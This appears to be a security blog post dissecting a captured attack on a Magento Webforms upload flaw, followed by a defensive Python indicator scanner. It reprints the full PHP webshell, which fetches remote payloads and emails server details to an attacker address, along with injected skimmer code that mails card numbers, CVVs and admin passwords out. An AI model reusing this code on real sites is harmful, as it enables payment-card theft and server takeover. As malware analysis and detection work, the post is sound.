Magento Webforms Upload Vulnerability

In a ModSecurity audit log we found an exploitation attempt against the Magento Webforms upload vulnerability.

--ab16e752-B--
POST /js/webforms/upload/ HTTP/1.1
User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)
Host: malware.expert
Accept: */*
Content-Length: 2163
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------6a5fe0ef92e39879

Looking closer at the POST payload, we found this image.phtml script, which is first uploaded to the customer's website. If the index.php / image.phtml file is uploaded successfully, it can be accessed from the web and executed!

image.phtml

--------------------------6a5fe0ef92e39879
Content-Disposition: form-data; name="files[]"; filename="image.phtml"
Content-Type: application/octet-stream

<?php
echo base64_decode("RmF0aHVyRnJlYWt6IFdhcyBIZXJlICE=");
$uname = php_uname();
function auto($type,$path = null, $content = null){
	$root = $_SERVER['DOCUMENT_ROOT'];
	$file = $root."/".$path;
	switch($type){
		case "PATCH":
			if(unlink($root."/js/webforms/upload/index.php")){
				echo "Patch = Success<br>";
			} else {
				echo "Patch = Failed<br>";
			}
		break;
		case "LOG":
			$write = fopen($file, "w");
			if($write){
				echo (fwrite($write,$content) ? "Write : '".$file."' [Success]<br>" : "Write : '".$file."' [Failed]<br>");
				fclose($write);
			} else {
				echo "File : '".$file."' [Not Writeable]<br>";
			}
		break;
	}
}

mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");
echo "<br>".$uname."<br>";
auto("PATCH");
auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));
auto("LOG","skin/adminhtml/default/default/xmlconnect/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","skin/adminhtml/default/default/images/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","shell/htaccess.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
echo "<form method='post' enctype='multipart/form-data'><input type='file' name='file'><input type='submit' name='upload' value='upload'></form>";
if(isset($_POST['upload'])){
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
		echo "Success";
	} else {
		echo "Failed";
	}
}
?>
--------------------------6a5fe0ef92e39879--

First it sends an email to fileputcontent@gmail.com with details such as the hostname, URL and IP address:

mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");

Then it tries to "patch" Magento and remove itself, by unlinking the vulnerable upload handler:

if(unlink($root."/js/webforms/upload/index.php")){

Finally it replaces the Magento payment method file Cc.php to steal customer payment details, and Session.php to capture admin login details:

auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));

Cc.php

In the Cc.php file, code was added to capture customer payment details and email them out. In the function assignData() a call to another function was added:

public function assignData($data)
    {
    .
    .
    .
    //THIS LINE ADDED
    $this->ccNumberProccess();

In the ccNumberProccess() function it collects the customer's billing address and card details and emails them to fileputcontent@gmail.com:

function ccNumberProccess()
    {
        $pay = $this->getInfoInstance();
        $object = new Mage_Checkout_Block_Onepage_Billing;
        $billing = $object->getQuote()->getBillingAddress();
		$email = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
		$setBilling = $this->setBilling($billing->getFirstname(),$billing->getLastname(),$billing->getStreet(1),$billing->getStreet(2),$billing->getCity(),$billing->getRegion(),$billing->getPostcode(),$billing->getCountry(),$billing->getTelephone(),$email);
		$invoice = "";
		foreach($setBilling as $key=>$value){
			$invoice .= $key.' = '.$value."\n";
		}
		$bin     = str_replace(' ', '', $pay->getCcNumber());
		$bin     = substr($bin, 0, 6);
		$getbank = explode($bin, file_get_contents("http://bins.pro/search?action=searchbins&bins=" . $bin . "&bank=&country="));
		$jeniscc = explode("</td><td>", $getbank[2]);
		$namabnk = explode("</td></tr>", $jeniscc[5]);
		$ccbrand = $jeniscc[2];
		$ccbank = $namabnk[0];
		$cctype = $jeniscc[3];
		$ccklas = $jeniscc[4];			
		$invoice .= "Card = ".$pay->getCcNumber()."\n";
		$invoice .= "Expired = ".$pay->getCcExpMonth()."/".substr($pay->getCcExpYear(),-2)."\n";
		$invoice .= "Security = ".$pay->getCcCid()."\n";
		$invoice .= "Site = http://".$_SERVER['HTTP_HOST']."/\n";
		$invoice .= "Date = ".date("d-m-Y h:i:s");
		$subject = $ccbank." - ".$cctype." - ".$ccklas." From ".$_SERVER['HTTP_HOST']."|".$setBilling['Country'];
		mail(base64_decode("ZmlsZXB1dGNvbnRlbnRAZ21haWwuY29t"),$subject,$invoice,"From: ".$billing->getFirstname()." ".$billing->getLastname()." <".$email.">");
		
    }

Session.php

It also steals the Magento admin session information (username & password) and sends it by email:

public function login($username, $password, $request = null)
    {
    .
    .
    .
    //ADDED THIS LINE
    mail("fileputcontent@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);
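Added example (not code from the original post): a small Python checker that flags executable filenames in the captured multipart upload and scans a Magento docroot for the indicators above, i.e. the dropped files and the mail() injections in Cc.php and Session.php. The paths and strings are taken from the captured scripts; the sample body is constructed, and the assumption that the stock versions of Cc.php and Session.php make no raw mail() call is mine.

```python
import re
from pathlib import Path
EXECUTABLE_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)  # names a PHP host would execute
# Strings lifted from the captured image.phtml, Cc.php and Session.php above.
IOC_STRINGS = ("fileputcontent@gmail.com", "ZmlsZXB1dGNvbnRlbnRAZ21haWwuY29t", "ccNumberProccess", "bins.pro")
MAIL_CALL = re.compile(r"\bmail\s*\(")  # assumption: the stock core files below make no raw mail() call
CORE_FILES = ("app/code/core/Mage/Payment/Model/Method/Cc.php", "app/code/core/Mage/Admin/Model/Session.php")
DROPPED_FILES = ("skin/adminhtml/default/default/xmlconnect/remove.php",
                 "skin/adminhtml/default/default/images/remove.php", "shell/htaccess.php")
# Constructed sample body modelled on the audit-log capture above (payload shortened).
SAMPLE_BOUNDARY = "------------------------6a5fe0ef92e39879"
SAMPLE_BODY = ("--" + SAMPLE_BOUNDARY + "\r\n"
               'Content-Disposition: form-data; name="files[]"; filename="image.phtml"\r\n'
               "Content-Type: application/octet-stream\r\n\r\n<?php echo 1; ?>\r\n"
               "--" + SAMPLE_BOUNDARY + "--\r\n")
def uploaded_filenames(body, boundary):
    """Filenames declared in a multipart/form-data body (e.g. the audit-log request body)."""
    names = []
    for part in body.split("--" + boundary):
        m = re.search(r'filename="([^"]*)"', part)
        if m:
            names.append(m.group(1))
    return names

def risky_uploads(body, boundary):
    """Uploaded names the web server would execute, like image.phtml in the capture."""
    return [n for n in uploaded_filenames(body, boundary) if EXECUTABLE_EXT.search(n)]

def scan_contents(files):
    """files maps a relative path to its text, or None if absent; returns (path, reason) findings."""
    findings = []
    for rel in DROPPED_FILES:
        if files.get(rel) is not None:
            findings.append((rel, "dropped webshell file present"))
    for rel in CORE_FILES:
        src = files.get(rel)
        if src is None:
            continue
        hits = [s for s in IOC_STRINGS if s in src]
        if hits:
            findings.append((rel, "known indicator: " + ", ".join(hits)))
        elif MAIL_CALL.search(src):
            findings.append((rel, "unexpected mail() call"))
    return findings

def scan_magento_root(root):
    """Disk wrapper: read the watched paths under a Magento docroot and scan them."""
    files = {rel: Path(root, rel).read_text(errors="replace") if Path(root, rel).is_file() else None
             for rel in DROPPED_FILES + CORE_FILES}
    return scan_contents(files)
```

Run scan_magento_root("/path/to/magento") on a suspect install; an empty list means none of the watched indicators were found, not that the site is clean.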